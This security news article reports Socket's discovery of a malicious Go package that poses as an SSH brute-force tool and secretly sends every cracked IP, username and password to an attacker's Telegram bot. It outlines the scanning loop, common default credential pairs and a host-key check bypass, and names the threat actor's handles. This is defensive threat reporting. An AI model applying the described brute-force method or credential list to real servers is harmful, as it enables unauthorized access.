Malicious Go Package Steals Your SSH Credentials in a “Brute-Force” Scam

The open-source ecosystem has once again been exploited to distribute malicious software. Socket’s Threat Research Team has uncovered a dangerous Go module package that pretends to be a fast SSH brute-force tool, but in reality, it hands over every successful login credential to its author.

The package, published on GitHub and the Go Module ecosystem under the alias IllDieAnyway, disguises itself as an offensive security utility. However, the code is designed to continuously scan random IPv4 addresses for exposed SSH services on port 22 and attempt authentication using a local wordlist of weak credentials.

On the first successful login, the program betrays the operator:

“On the first successful login, the package sends the target IP address, username, and password to a hardcoded Telegram bot controlled by the threat actor.”

This exfiltration is done through the Telegram Bot API using HTTPS, making the traffic blend in with legitimate web requests. The hardcoded bot (@sshZXC_bot) sends stolen credentials directly to a private chat controlled by the attacker, identified as @io_ping (alias Gett).

The Go code makes no attempt to hide its intent once examined:

• Infinite Loop Scanning – Random IPv4 addresses are probed for open port 22.
• Weak Wordlist Attacks – Usernames like root and admin are paired with common defaults such as toor, raspberry, dietpi, alpine, and 123456.
• Host Key Bypass – The code explicitly sets ssh.InsecureIgnoreHostKey() to skip identity verification.
• Silent Exfiltration – Upon success, the tool sends ip:user:pass directly to the Telegram chat.

As Socket researchers noted:

“The strategy is straightforward and effective. Release a ‘fast’ offensive utility, then hardcode an exfiltration endpoint for every success. The package offloads scanning and password guessing to unwitting operators, spreads risk across their IPs, and funnels the successes to a single threat actor-controlled Telegram bot.”

The package’s publisher, known as IllDieAnyway (alias G3TT), maintains an arsenal of offensive tools on GitHub. These include fast port scanners, a phpMyAdmin brute forcer with Telegram callbacks, and even a C2 framework called Selica-C2.

Socket’s analysis linked this actor to the Russian-speaking cybercrime community:

“We assess with high confidence that IllDieAnyway is a Russian-speaking threat actor. This conclusion is based on consistent Russian-language artifacts across the threat actor’s GitHub repositories.”

Running the malicious Go package exposes unsuspecting users to both legal and security consequences. Operators believe they are conducting brute-force penetration testing, but instead, they are supplying fresh credentials to a threat actor who can exploit them for profit, espionage, or further attacks.

Unauthorized SSH access is a hot commodity in underground markets, used to fuel botnets, ransomware campaigns, and illicit cryptomining.

Related Posts:

• Apache Tomcat Under Attack: Massive Brute-Force Campaign Targets Manager Interfaces
• Google Account Flaw Exposed Phone Numbers: Brute-Force Attack Possible, Now Patched
• Malicious npm Packages Backdoor Telegram Bot Developers
• Data at Risk: Three-Quarters of Top Websites Leave Users Exposed to Cyberattacks
• Malicious npm Packages Exploiting Typosquatting to Inject SSH Backdoors